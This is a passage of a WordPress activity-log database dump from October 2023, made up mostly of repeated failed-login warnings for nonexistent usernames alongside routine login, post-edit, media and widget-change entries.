05:09:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40360,'2023-10-28 05:21:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40361,'2023-10-28 05:35:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40362,'2023-10-28 05:49:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40363,'2023-10-28 05:51:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40364,'2023-10-28 06:03:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40365,'2023-10-28 06:18:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40366,'2023-10-28 06:32:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40367,'2023-10-28 06:32:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40368,'2023-10-28 06:40:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40369,'2023-10-28 06:40:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40370,'2023-10-28 06:47:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40371,'2023-10-28 07:01:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40372,'2023-10-28 07:14:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40373,'2023-10-28 07:15:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40374,'2023-10-28 07:30:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40375,'2023-10-28 07:44:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40376,'2023-10-28 07:56:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40377,'2023-10-28 07:59:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40378,'2023-10-28 08:13:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40379,'2023-10-28 08:27:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40380,'2023-10-28 08:37:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40381,'2023-10-28 08:42:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40382,'2023-10-28 08:57:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40383,'2023-10-28 09:11:22','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','a6c1c2572588513ed77cb9a251f47581','wp'),(40384,'2023-10-28 09:11:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40385,'2023-10-28 09:20:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40386,'2023-10-28 09:26:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40387,'2023-10-28 09:40:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40388,'2023-10-28 09:55:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40389,'2023-10-28 10:03:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40390,'2023-10-28 10:09:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40391,'2023-10-28 10:24:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40392,'2023-10-28 10:38:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40393,'2023-10-28 10:46:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40394,'2023-10-28 10:52:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40395,'2023-10-28 11:07:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40396,'2023-10-28 11:22:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40397,'2023-10-28 11:29:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40398,'2023-10-28 11:36:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40399,'2023-10-28 11:51:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40400,'2023-10-28 12:05:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40401,'2023-10-28 12:13:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40402,'2023-10-28 12:20:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40403,'2023-10-28 12:30:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40404,'2023-10-28 12:34:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40405,'2023-10-28 12:49:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40406,'2023-10-28 12:58:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40407,'2023-10-28 13:03:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40408,'2023-10-28 13:17:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40409,'2023-10-28 13:32:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40410,'2023-10-28 13:45:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40411,'2023-10-28 13:47:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40412,'2023-10-28 14:02:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40413,'2023-10-28 14:16:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40414,'2023-10-28 14:31:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40415,'2023-10-28 14:46:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40416,'2023-10-28 14:58:24','SimpleUserLogger','info','Logged in','87c0b030fb7ede51bf3f2434cbf46021','wp_user'),(40417,'2023-10-28 14:59:34','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e8fcbc01f01e31a22d79f476c724e81d','wp_user'),(40418,'2023-10-28 15:00:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40419,'2023-10-28 15:03:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40420,'2023-10-28 15:05:08','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','dd26a6ddf43ec4e2b10f2ed09ce42507','wp_user'),(40421,'2023-10-28 15:06:05','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e8fcbc01f01e31a22d79f476c724e81d','wp_user'),(40422,'2023-10-28 15:06:54','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e8fcbc01f01e31a22d79f476c724e81d','wp_user'),(40423,'2023-10-28 15:07:37','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e8fcbc01f01e31a22d79f476c724e81d','wp_user'),(40424,'2023-10-28 15:14:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40425,'2023-10-28 15:29:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40426,'2023-10-28 15:34:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40427,'2023-10-28 15:43:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40428,'2023-10-28 15:58:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40429,'2023-10-28 16:07:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40430,'2023-10-28 16:13:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40431,'2023-10-28 16:28:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40432,'2023-10-28 16:42:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40433,'2023-10-28 16:57:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40434,'2023-10-28 17:12:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40435,'2023-10-28 17:26:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40436,'2023-10-28 17:29:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40437,'2023-10-28 17:41:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40438,'2023-10-28 17:56:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40439,'2023-10-28 18:10:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40440,'2023-10-28 18:25:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40441,'2023-10-28 18:40:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40442,'2023-10-28 18:53:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40443,'2023-10-28 18:55:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40444,'2023-10-28 19:09:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40445,'2023-10-28 19:24:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40446,'2023-10-28 19:39:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40447,'2023-10-28 19:54:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40448,'2023-10-28 20:08:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40449,'2023-10-28 20:15:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40450,'2023-10-28 20:23:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40451,'2023-10-28 20:38:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40452,'2023-10-28 20:53:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40453,'2023-10-28 21:07:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40454,'2023-10-28 21:37:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40455,'2023-10-28 22:48:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40456,'2023-10-28 22:59:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40457,'2023-10-29 00:22:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40458,'2023-10-29 00:47:28','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','13bb370a1a66d1025983ac239bedf50d','other'),(40459,'2023-10-29 00:50:51','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e2e8769ba701367eea6351aa4d8258b2','other'),(40460,'2023-10-29 01:46:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40461,'2023-10-29 02:30:27','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','2c5f061a9b27e1d499871395126badf3','other'),(40462,'2023-10-29 03:15:13','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40463,'2023-10-29 03:26:06','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e8fcbc01f01e31a22d79f476c724e81d','wp_user'),(40464,'2023-10-29 03:27:29','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','143ff2e5ecd28bb08efd46d708932204','wp_user'),(40465,'2023-10-29 03:29:07','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','fdab0469733cad98849015b3dd9bb567','wp_user'),(40466,'2023-10-29 03:36:13','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40467,'2023-10-29 05:58:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40468,'2023-10-29 08:16:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40469,'2023-10-29 08:39:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40470,'2023-10-29 10:05:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40471,'2023-10-29 11:29:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40472,'2023-10-29 12:54:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40473,'2023-10-29 14:06:20','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4256218db98fc57018ebd81a94bef7de','other'),(40474,'2023-10-29 14:21:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40475,'2023-10-29 14:42:47','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40476,'2023-10-29 14:48:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40477,'2023-10-29 15:03:30','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40478,'2023-10-29 15:06:29','SimpleCategoriesLogger','info','Added term \"{term_name}\" in taxonomy \"{term_taxonomy}\"','b38b8f0c635ab47a6765ae5cb66590f9','wp_user'),(40479,'2023-10-29 15:06:50','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ae01cbb214c35b4acbd25b15fd66b3e7','wp_user'),(40480,'2023-10-29 15:09:10','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ae01cbb214c35b4acbd25b15fd66b3e7','wp_user'),(40481,'2023-10-29 15:09:42','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ae01cbb214c35b4acbd25b15fd66b3e7','wp_user'),(40482,'2023-10-29 15:10:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40483,'2023-10-29 15:15:01','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ae01cbb214c35b4acbd25b15fd66b3e7','wp_user'),(40484,'2023-10-29 15:45:16','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','35b3d48462de17ef1ae279c418b791eb','wp_user'),(40485,'2023-10-29 15:45:32','SimpleThemeLogger','info','Customized theme appearance \"{setting_id}\"','e2785828a834c63bd8c8c00041efabe2','wp_user'),(40486,'2023-10-29 15:45:32','SimpleThemeLogger','info','Customized theme appearance \"{setting_id}\"','48df3467d7ec2b996bbd10be40ee1bd5','wp_user'),(40487,'2023-10-29 15:46:19','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40488,'2023-10-29 15:48:45','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','5f7227918ce8a5ecf440357cc1b59b34','wp_user'),(40489,'2023-10-29 15:48:47','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','a64edc830f40366a6680b630faae002f','wp_user'),(40490,'2023-10-29 15:49:00','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','6c013023da1e7f1d79a8eae1dd69d485','wp_user'),(40491,'2023-10-29 15:49:01','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','d9bc36cbe19b04e069fe2c369160f493','wp_user'),(40492,'2023-10-29 15:49:01','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','4ae44f05761a2db8707390fe7d211a0e','wp_user'),(40493,'2023-10-29 15:49:02','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','8fcebb6b3574ac1a9cb522afcaa3dd01','wp_user'),(40494,'2023-10-29 15:49:02','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','d7f5fecb551f8497e9d7d2805a2a9616','wp_user'),(40495,'2023-10-29 15:49:08','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','62ae1f394bab9e4d28dfd3934305bbe9','wp_user'),(40496,'2023-10-29 15:49:31','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','4c905041122cef61bc7c7922e6454ea8','wp_user'),(40497,'2023-10-29 15:49:32','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','4e0285b92fd1720faefe34b33977cd17','wp_user'),(40498,'2023-10-29 15:49:33','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','285f8794ee425b3d6e04d67343c4e9fd','wp_user'),(40499,'2023-10-29 15:49:38','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','73f1dff547dc588870768c0e398fb0a1','wp_user'),(40500,'2023-10-29 15:49:39','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','de10f5b3c43e9b0f9f31e8c27b0c44ae','wp_user'),(40501,'2023-10-29 15:49:39','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','563cd78151c5a86562f6711280f75e05','wp_user'),(40502,'2023-10-29 15:49:44','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','700146228f50538b049d702e2c9e4881','wp_user'),(40503,'2023-10-29 15:49:44','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','82b0dd3e988413c5dd23bb358ca501e9','wp_user'),(40504,'2023-10-29 15:50:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40505,'2023-10-29 15:50:15','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','169c22da51828799cbac52db6c845f36','wp_user'),(40506,'2023-10-29 15:57:23','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40507,'2023-10-29 15:59:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39133,'2023-10-20 07:52:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39134,'2023-10-20 08:03:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39135,'2023-10-20 08:15:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39136,'2023-10-20 08:26:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39137,'2023-10-20 08:37:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39138,'2023-10-20 08:48:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39139,'2023-10-20 09:00:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39140,'2023-10-20 09:00:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39141,'2023-10-20 09:11:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39142,'2023-10-20 09:23:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39143,'2023-10-20 10:23:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39144,'2023-10-20 13:05:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39145,'2023-10-20 14:15:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39146,'2023-10-20 15:25:09','SimpleUserLogger','info','Logged in','528752c6331856c09b87588bff413d72','wp_user'),(39147,'2023-10-20 15:26:49','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','532cd92bbd8e190a81b855766af329d4','wp_user'),(39148,'2023-10-20 15:27:09','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','6c74a269a039a7fee2555682e96a0902','wp_user'),(39149,'2023-10-20 15:33:35','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','fa8cf74d12a6c2e438fd35ac335fe71b','wp_user'),(39150,'2023-10-20 15:35:30','SimpleMediaLogger','info','Deleted {post_type} \"{attachment_title}\" (\"{attachment_filename}\")','d19a61e627204e7a73526b00219bf65e','wp_user'),(39151,'2023-10-20 15:35:30','SimpleMediaLogger','info','Deleted {post_type} \"{attachment_title}\" (\"{attachment_filename}\")','578e40c552aea26cb3ef02936b431e27','wp_user'),(39152,'2023-10-20 15:35:30','SimpleMediaLogger','info','Deleted {post_type} \"{attachment_title}\" (\"{attachment_filename}\")','34ea9c68ed0581ff3b1e2a61fd337f92','wp_user'),(39153,'2023-10-20 15:35:30','SimpleMediaLogger','info','Deleted {post_type} \"{attachment_title}\" (\"{attachment_filename}\")','204354b891a5f34212be584c17d23d89','wp_user'),(39154,'2023-10-20 15:38:48','SimpleUserLogger','info','Logged in','528752c6331856c09b87588bff413d72','wp_user'),(39155,'2023-10-20 15:41:10','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(39156,'2023-10-20 15:43:11','SimpleMenuLogger','info','Edited menu \"{menu_name}\"','cef15fadd5291341527454ae0aff26a3','wp_user'),(39157,'2023-10-20 15:55:15','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','93b9a715324524347fbe8b7ed6400e2b','wp'),(39158,'2023-10-20 16:02:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39159,'2023-10-20 16:02:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39160,'2023-10-20 16:19:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39161,'2023-10-20 16:31:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39162,'2023-10-20 16:42:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39163,'2023-10-20 16:45:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39164,'2023-10-20 16:54:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" 